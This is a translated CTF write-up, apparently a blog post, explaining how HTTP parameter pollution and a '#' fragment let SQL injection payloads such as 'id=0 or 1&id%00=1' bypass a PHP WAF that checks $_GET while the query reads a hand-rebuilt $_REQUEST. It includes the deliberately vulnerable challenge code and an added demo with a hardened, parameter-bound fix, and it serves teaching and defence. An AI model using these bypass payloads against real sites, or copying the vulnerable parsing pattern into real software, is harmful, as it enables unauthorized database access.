Two PHP features that let SQL injection bypass a WAF (interesting knowledge points)

Source: Internet
Author: User
1. HPP (HTTP Parameter Pollution). HTTP parameter pollution refers to how the server side handles a request that carries two parameters with the same key. The handling is platform-specific; PHP (here running behind Apache) keeps the last value. For example: user.php?id=111&id=222. If you dump the $_GET array, id only holds 222, i.e. the later value on the URL overwrites the earlier one.
2. A CTF challenge: http://drops.wooyun.org/tips/17248

The challenge is about bypassing a WAF to inject. The injection point is:

    $sql = "SELECT * from user where id=" . $_REQUEST["id"] . ";";

The value comes from $_REQUEST, and the following WAF code sits in front of it:

    function waf($str) {
        if (stripos($str, "select") !== false) die("Be a good person!");
        if (stripos($str, "union") !== false) die("Be a good person!");
        ......
    }

    function wafarr($arr) {
        foreach ($arr as $k => $v) {
            waf($k);   // both keys and values are checked
            waf($v);
        }
    }

    // The WAF only ever sees these four arrays; $_REQUEST is never passed to it
    wafarr($_GET);
    wafarr($_POST);
    wafarr($_COOKIE);
    wafarr($_SESSION);

    function stripstr($str) {
        if (get_magic_quotes_gpc()) $str = stripslashes($str);
        return addslashes(htmlspecialchars($str, ENT_QUOTES, 'UTF-8'));
    }

    // $_REQUEST is rebuilt by hand from the raw request line: the values are
    // escaped, but neither keys nor values go through waf(), and nothing is URL-decoded
    $uri = explode("?", $_SERVER['REQUEST_URI']);
    if (isset($uri[1])) {
        $parameter = explode("&", $uri[1]);
        foreach ($parameter as $k => $v) {
            $v1 = explode("=", $v);
            if (isset($v1[1])) {
                $_REQUEST[$v1[0]] = stripstr($v1[1]);
            }
        }
    }

    function striparr($arr) {
        $new_arr = array();
        foreach ($arr as $k => $v) {
            $new_arr[stripstr($k)] = stripstr($v);
        }
        return $new_arr;
    }

    $_GET = striparr($_GET);
    $_POST = striparr($_POST);
    $_COOKIE = striparr($_COOKIE);
    $_SESSION = striparr($_SESSION);
Here the waf function filters the $_GET, $_POST, $_SESSION and $_COOKIE data, and striparr escapes those global arrays. What stands out is that $_REQUEST is not checked by waf at all: the code rebuilds it from $_SERVER['REQUEST_URI'], splitting on ? and &, and only the values are escaped (by stripstr) during that rebuild. Note also that REQUEST_URI is the raw request line and is not URL-decoded, so a %20 reaches $_REQUEST literally (the dump further down shows '0%20or%201'); a payload containing spaces therefore has to be sent with raw spaces (for example from Burp) or written with /**/ in place of the spaces.

(1) Idea 1: use HPP. At first sight injection looks impossible, but HPP makes it possible. Sample payloads:

    user.php?id=0 or 1&id%00=1
    user.php?id=0 or 1&%20id=1
    user.php?id=0 or 1?&id=1

In each case PHP normalises the second key back to id when it builds $_GET (a variable name is cut at a NUL byte, leading spaces are dropped, and a ? inside the query string is an ordinary character), so $_GET['id'] ends up as the harmless 1. The hand-written explode() loop does none of this: it keeps 0 or 1 under the key id, and for the third payload it never even sees the part after the second ?.
Test code:

    <?php

    function striparr($arr) {
        $new_arr = array();
        foreach ($arr as $k => $v) {
            $new_arr[stripstr($k)] = stripstr($v);
        }
        return $new_arr;
    }

    function stripstr($str) {
        // get_magic_quotes_gpc() only exists up to PHP 7.4; it was removed in PHP 8
        if (get_magic_quotes_gpc())
            $str = stripslashes($str);
        return addslashes(htmlspecialchars($str, ENT_QUOTES, 'UTF-8'));
    }

    // Rebuild $_REQUEST from the raw, undecoded request line, as the challenge does
    $uri = explode("?", $_SERVER['REQUEST_URI']);
    if (isset($uri[1])) {
        $parameter = explode("&", $uri[1]);
        foreach ($parameter as $k => $v) {
            $v1 = explode("=", $v);
            if (isset($v1[1])) {
                $_REQUEST[$v1[0]] = stripstr($v1[1]);
            }
        }
    }

    var_dump($_GET);

    var_dump($_REQUEST);

    ?>
Output results (shown as a screenshot in the original; the relevant values are repeated in the summary below):

As you can see, $_GET takes the last value and therefore does not trigger the WAF, while in $_REQUEST the value of id is our injection statement. By exploiting the difference between the two we bypass the WAF check and use the injection point above.
(2) Idea 2: use the # behaviour of $_SERVER['REQUEST_URI']. A browser never sends the part after # (the fragment) to the server, but with Burp you can put it on the wire. Sending /#?id=1, for example, leaves the $_GET array empty, while $_REQUEST is rebuilt from the REQUEST_URI /#?id=1 and so contains id=1. The WAF's check of $_GET sees nothing, yet the injected statement still reaches $_REQUEST (precisely because $_REQUEST is reassembled from REQUEST_URI). The WAF detection is bypassed.

3. Summary. The vulnerable scenario caused by these features is rather special. In the CTF the WAF function only processes the $_GET, $_POST, $_SESSION and $_COOKIE global arrays, while the injection point reads $_REQUEST, and the code rebuilds $_REQUEST from $_SERVER['REQUEST_URI'] by splitting on &, probably added by a programmer who wanted to escape or clean up the $_REQUEST array. Two ways to use it:

(1) HPP: submit a duplicate parameter. PHP's own parsing lets the later value overwrite the earlier one, but the program's string splitting behaves differently. For example, submitting http://127.0.0.1/shell.php?id=0 or 1&id%00=1 gives id=1 in $_GET, while $_REQUEST is:

      'id' => '0%20or%201' (length=10)
      'id%00' => '1' (length=1)

As you can see, the injected content is successfully introduced into the $_REQUEST array (the %20 shows that the value is taken verbatim from the undecoded REQUEST_URI).

(2) The # symbol: the content after # is not carried into the $_GET array, but it does appear in REQUEST_URI, so the same feature brings the injection statement into $_REQUEST. All in all, the vulnerable scenario these features create is rather special, but it is genuinely interesting.
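The following script is an added example and is not code from the original post or the CTF. It replays the three HPP payloads and the fragment payload offline, with no web server: $_GET is emulated with parse_str(), which applies the same variable-name normalisation PHP uses when it populates $_GET, and $_REQUEST['id'] is rebuilt exactly as the challenge code does. The QUERY_STRING column is an assumption taken from what the post says the server sees for each request, spaces are sent raw as they would be from Burp, and the magic-quotes branch of the original stripstr is dropped because magic quotes no longer exist since PHP 5.4. The function names request_from_uri, get_from_query_string and safe_lookup are hypothetical, the user table and its rows are constructed for the demo, and the hardened lookup assumes the pdo_sqlite extension is present.

```php
<?php
// Added example (not from the original post). Compares what the WAF inspects
// ($_GET, via parse_str) with what the challenge's rebuilt $_REQUEST feeds into
// the SQL string, for each payload discussed in the post.

function stripstr($str) {
    // Same escaping as the challenge, minus the long-gone magic-quotes branch.
    return addslashes(htmlspecialchars($str, ENT_QUOTES, 'UTF-8'));
}

// The challenge's reconstruction of $_REQUEST from the raw request line.
function request_from_uri($request_uri) {
    $request = array();
    $uri = explode("?", $request_uri);      // anything after a second '?' is dropped
    if (isset($uri[1])) {
        foreach (explode("&", $uri[1]) as $pair) {
            $kv = explode("=", $pair);       // the key is neither decoded nor normalised
            if (isset($kv[1])) {
                $request[$kv[0]] = stripstr($kv[1]);
            }
        }
    }
    return $request;
}

// What PHP itself puts in $_GET: the last duplicate wins, leading spaces are
// dropped from a name, and a name is cut at a NUL byte.
function get_from_query_string($query_string) {
    parse_str($query_string, $get);
    return $get;
}

// Constructed cases: name => [REQUEST_URI, QUERY_STRING as the post reports it].
$cases = array(
    'baseline'      => array('/user.php?id=1',              'id=1'),
    'NUL in key'    => array('/user.php?id=0 or 1&id%00=1', 'id=0 or 1&id%00=1'),
    'leading space' => array('/user.php?id=0 or 1&%20id=1', 'id=0 or 1&%20id=1'),
    "second '?'"    => array('/user.php?id=0 or 1?&id=1',   'id=0 or 1?&id=1'),
    'fragment'      => array('/#?id=0 or 1',                ''),
);

foreach ($cases as $name => $c) {
    $get     = get_from_query_string($c[1]);
    $request = request_from_uri($c[0]);
    $get_id  = isset($get['id']) ? $get['id'] : '(unset)';
    $req_id  = isset($request['id']) ? $request['id'] : '(unset)';
    printf("%-14s WAF checks \$_GET['id'] = %-8s  query built: SELECT * from user where id=%s;\n",
           $name, $get_id, $req_id);
}

// Hardened handler: read the value from the array the WAF inspected, never from
// a hand-rebuilt $_REQUEST, validate it as an integer and bind it as a parameter.
function safe_lookup(PDO $pdo, array $get) {
    if (!isset($get['id']) || filter_var($get['id'], FILTER_VALIDATE_INT) === false) {
        return null;                         // "0 or 1" and friends are rejected outright
    }
    $stmt = $pdo->prepare('SELECT * FROM user WHERE id = :id');
    $stmt->bindValue(':id', (int) $get['id'], PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

if (extension_loaded('pdo_sqlite')) {
    // Constructed table and rows for the demo.
    $pdo = new PDO('sqlite::memory:');
    $pdo->exec('CREATE TABLE user (id INTEGER, name TEXT)');
    $pdo->exec("INSERT INTO user VALUES (1, 'alice'), (2, 'bob')");
    var_dump(safe_lookup($pdo, array('id' => '1')));        // one row
    var_dump(safe_lookup($pdo, array('id' => '0 or 1')));   // NULL: rejected
}
```

Run it with php on the command line: the first column shows that for every polluted payload the WAF would see id=1 (or no id at all for the fragment case), while the rebuilt $_REQUEST hands 0 or 1 to the query string. The fix is not a better blacklist: take the parameter from the same array the WAF validated and bind it as a typed parameter, so the second parsing path the attacker exploits simply does not exist.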
